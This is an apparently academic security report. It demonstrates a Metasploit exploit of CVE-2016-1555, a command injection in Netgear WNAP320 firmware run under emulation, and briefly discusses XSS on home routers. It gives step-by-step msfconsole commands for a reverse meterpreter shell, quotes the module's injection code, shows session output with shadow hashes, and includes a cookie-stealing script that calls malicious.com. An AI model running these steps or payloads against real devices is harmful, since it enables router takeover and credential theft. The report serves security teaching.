Router Exploitation With Metasploit

This is a demonstration showing the feasibility of router exploitation through the use of the exploitation framework Metasploit while only having the firmware emulated, id est without running it on actual hardware. The steps, including code and commands in order to reproduce the exploitation, will be presented and discussed. The act of exploiting routers through the use of cross-site scripting XSS will also be briefly discussed, along with the impact that a seemingly trivial vulnerability can have upon a router in a Small Office Home Office (SOHO) environment. Then, in part two of this report, A case for open-source alternative solutions to current proprietary tools will also be made and its relation to the “Right to repair” movement and the implications that might have upon both the forensic situation and automotive security field as a whole.

Router exploitation

Small Office Home Office (SOHO) routers may be regarded as the one entryway into either a home or small office. Because of this, the security of this class of routers is essential.

While most routers are not necessarily connected to the internet in such a way that remote users may access them across the web, there is still the possibility that a user may have (mis)configured their router to make such possible. A more pressing security issue, however, is that remote users in close proximity to a vulnerable router may still exploit it.

Leverage and entrance vectors

Before a router can be exploited, the backdoor or exploit will have to be leveraged to the system. There are several routes that may be attempted depending on factors such as physical availability of a network for an attacker, feasibility

A very predictable way that an unauthenticated user may gain access to a router is through default credentials. While this is luckily getting more uncommon in recent times, default passwords should always be changed. It is a simple measure with great implications for security. Default credentials can be present on various part of a SOHO networking system, but the most likely places where such can be used as an attack vector are devices that give an attacker a convenient way in. In a SOHO network, such devices would most commonly be wireless routers for the first barrier of entry. These can house two potential places where default passwords are present: access to the wireless network itself and access to the router’s administration interface. Any one of these things may severely increase the likelihood that a router may be compromised, and thus, the CIA principle is therefore broken as any data flowing through that device cannot be trusted in terms of either confidentiality, integrity or availability. However, as will be demonstrated, this is not the only vector that a malicious actor may take to compromise a router.

Backdooring

To prove the feasibility of backdooring a router, the firmware “WNAP320 Firmware Version 2.0.3” will be used (Netgear, 2020), which is utilised by the WNAP320 router by Netgear. The firmware was emulated through Firmware Analysis Toolkit (FAT) which created a virtual network that one may connect to. After the firmware was shown to be correctly emulating through a Nmap scan, exploitation could begin.

To backdoor this specific firmware, the first thing one may do is to look for a related “common vulnerabilities and exposures (CVEs) (Common Vulnerabilities, 2020) that can show the current possibilities for the exploitation of said firmware. For this exact firmware version, there are three vulnerabilities, each with their CVE identification number. However, there are only one with an available exploit to run through Metasploit, hence this is the CVE in question that will be used for demonstration purposes.

CVE-2016-1555

CVE-2016-1555 (Details, 2016), discovered by Dominic Chen (Chen, 2016), creator of FIRMADYNE, describes this vulnerability as a being a 10.0 on the CVSS score (Common Vulnerability Scoring System) which categorises it as an extremely serious vulnerability. Confidentiality impact, integrity impact, availability impact are regarded as “complete”, meaning it fully violates the CIA principle. It also is regarded as being easy to exploit, hence its categorisation of access complexity as low, with a complete lack of authentication in order to exploit the vulnerability.

The exploit is prepared to be used in the exploit framework “Metasploit” which makes it easy both to demonstrate what is being done in this exploit, as well as doing so successfully. In Metasploit, the aforementioned CVE is called “exploit/linux/http/netgear_unauth_exec”.

The following steps may be taken to backdoor the server.

  1. Start msfconsole
  2. use exploit/linux/http/netgear_unauth_exec
  3. set RHOST <RouterIP>
  4. set SRVHOST <Your server’s IP> if your payload is not hosted on a different system
  5. set LHOST <Your IP>
  6. set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp if you want meterpreter session
  7. exploit
  8. Payload is dropped through wget and a meterpreter session should start

After these steps, a meterpreter session is established and hence a backdoor is now persistent in the router. To ensure that one has full access to the router, one may run theshellto get a system shell instead of the meterpreter one, and then proceed to check which user one is acting as with the UNIX command “whoami”. The router’s system shell should respond withroot, confirming that one does indeed have access to the entirety of the system. This can further be demonstrated by showing the content of the /etc/shadowfile which contains the passwords of the system. And, indeed, full system access has been achieved as the contents of the file reveal the passwords, albeit hashed. The file is shown truncated below.

root:$1$SY8xv/KM$/alQgidqWfIrXjfEygXJi/:10933:0:99999:7:::
admin:$1$sWd7LBi.$22b3w4YMbBqRLBA5ptDac/:10933:0:99999:7:::

Why it works

In the vulnerability disclosure done by Dominic Chen, several Netgear devices had unauthenticated webpages, which in turn passed input from web forms directly to the commandline into several PHP files, namely ‘boardData102.php‘, ‘boardData103.php‘, ‘boardDataJP.php‘, ‘boardDataNA.php‘, and ‘boardDataWW.php‘. In other words, it is a relatively classic example of command injection.

In the Metasploit exploit written in Ruby (ide0x90, 2018), one may clearly see how the script establishes a test to see if the firmware is vulnerable by generating random text data as a fingerprinting measure.

# check for vulnerability existence
def check
  fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present(...)
  res = execute_command("echo #{fingerprint}") # the raw POST response
  unless res
    vprint_error Connection failed
    return CheckCode::Unknown
  end
  unless res.code == 200
    return CheckCode::Safe
  end
  unless res.get_html_document.at(input).to_s.include? fingerprint
    return CheckCode::Safe
  end
CheckCode::Vulnerable
end

If either the HTTP response code is 200 or the randomly generated text is returned in the same form, the vulnerability check is passed, and hence one may proceed to exploit the system through the following command:

# execute a command, or simply send a POST request
def execute_command(cmd, opts = {})
  vars_post = {
  macAddress => "#{datastore[MAC_ADDRESS]};#{cmd};",
  reginfo => 1,
  writeData => Submit
  }

  send_request_cgi({
    method => POST,
    headers => { Connection => Keep-Alive },
    uri => normalize_uri(target_uri.path),
    vars_post => vars_post
    })

rescue ::Rex::ConnectionError
  fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
end

# the exploit method
def exploit
  #run a check before attempting to exploit
  unless [CheckCode::Vulnerable].include? check
    fail_with Failure::NotVulnerable, Target is most likely not vulnerable!
  end

  execute_cmdstager(linemax: 2048) # maximum 130,
end

The aforementioned code constructs a POST requests which contains a MAC address specified (or randomised) by Metasploit, but along with it also the command injection as specified by the “cmd” positional argument. This data is packaged into thesend_request_cgi() method and is then run. From there, the script can call Metasploit and execute the command stager, thus handing back the control to Metasploit and subsequently receive the connection from the reverse shell.

Reverse shell

The final stage is to select one’s payload of choice, and since the Ruby implementation’s author recommended “linux/mipsbe/meterpreter/reverse_tcp”, this is what will be used. This meterpreter shell allows for specifying which IP address the reverse TCP shell should be communicating with. It is therefore important to note here that this IP address is that of the virtualised network adapter created by FAT, not one’s actual physical network adapter. Finally, one may run the exploit and deliver the payload to the router.

[*] Started reverse TCP handler on 192.168.0.2:
[*] Using URL: http://0.0.0.0:8080/g5opHCWiD2Q
[*] Local IP: http://172.24.82.82:8080/g5opHCWiD2Q
[*] Client 192.168.0.100 (Wget) requested /g5opHCWiD2Q
[*] Sending payload to 192.168.0.100 (Wget)
[*] Sending stage (1256712 bytes) to 192.168.0.
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.100:54204) (...)
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.

meterpreter > ls
Listing: /home/www
==================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 862 fil 2020-04-07 04:12:55 +0200 BackupConfig.php
100444/r--r--r-- 4385 fil 2020-04-07 04:12:55 +0200 UserGuide.html
100444/r--r--r-- 900 fil 2020-04-07 04:12:55 +0200 background.html
100444/r--r--r-- 3646 fil 2020-04-07 04:12:55 +0200 boardDataNA.php
100444/r--r--r-- 3638 fil 2020-04-07 04:12:55 +0200 boardDataWW.php
100444/r--r--r-- 393 fil 2020-04-07 04:12:55 +0200 body.php

After getting the meterpreter shell, one may, amongst many other functions, traverse the directories, upload files and modify routing tables. As mentioned above, one may also enter into the system shell instead and carry out one’s work with more traditional UNIX commands if one so wishes.

2.3 XSS

Cross-site scripting (XSS) is a common tactic when it comes to injecting code into an entity using web technology. In its most basic form, an attacker can send a link which contains malicious code to a victim. This code is subsequently run either upon clicking the link or in some cases, by simply visiting a site which contains the malicious piece of code.

A writeup specifically targeting the security of common SOHO routers was made by Craig Heffner and Derek Yap. In this writeup, it was found that SOHO routers had a general rather poor security. Amongst the vulnerabilities discovered in these routers were various kinds of XSS; both authenticated and unauthenticated (Heffner & Yap, 2009). Similarly, researchers from the Ruhr University Bochum in Germany investigated home routers with a specific focus on XSS, which proved, again, that home routers have generally poor protection against XSS attacks. The following is an example of an XSS attack adapted from an example by OWASP (OWASP, 2020):

<SCRIPT type="text/javascript">
  var adr = http:malicious.com/evil.php?cakemonster= +
  escape(document.cookie);
</SCRIPT>

In the example above, a web cookie is stolen by injecting a malicious script (being evil.php) into a valid website. Further scripting can then be done so that a malicious actor can steal the cookies of an ongoing web session, and hence compromise the session. Such code may be sent to a victim either through, a website, web application (ia. Electron applications) or their e-mail. Routers, being the central hub for the flow of data, are therefore vital to secure. And given the aforementioned research into the generally poor security that plagues these devices, more research and attention is needed to secure the SOHO networking environment.

Conclusion

As has been shown, it is fairly trivial to exploit a router, either through the use of existing tools such as Metasploit or though the vast number of unescaped information that will eventually lead to vulnerabilities such as XSS. The principle for this topic is clear: no matter what the device is, the price to pay for not having secure devices can be grave, even if the device belongs to a small home network.

References

Chen, D. (2016). D-link / netgear firmadyne command injection / buffer overflow. Retrieved from https://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html

Common Vulnerabilities. (2020). Cve - common vulnerabilities and exposures. Retrieved from https://cve.mitre.org/

Details, C. (2016). Vulnerability details : Cve-2016-1555. Retrieved from https://www.cvedetails.com/cve/CVE-2016-1555/

Heffner, C., & Yap, D. (2009). Security vulnerabilities in soho routers.

ide0x90. (2018). Metasploit module for cve-2016-1555. Retrieved from https://github.com/ide0x90/cve-2016-1555/

Netgear. (2020). Netgear firmware download - wnap320v2.0.3. Retrieved from http://www.downloads.netgear.com/files/GDC/WNAP320/WNAP320%20Firmware%20Version%202.0.3.zip

OWASP. (2020). Cross site scripting (xss). Retrieved from https://owasp.org/www-community/attacks/xss/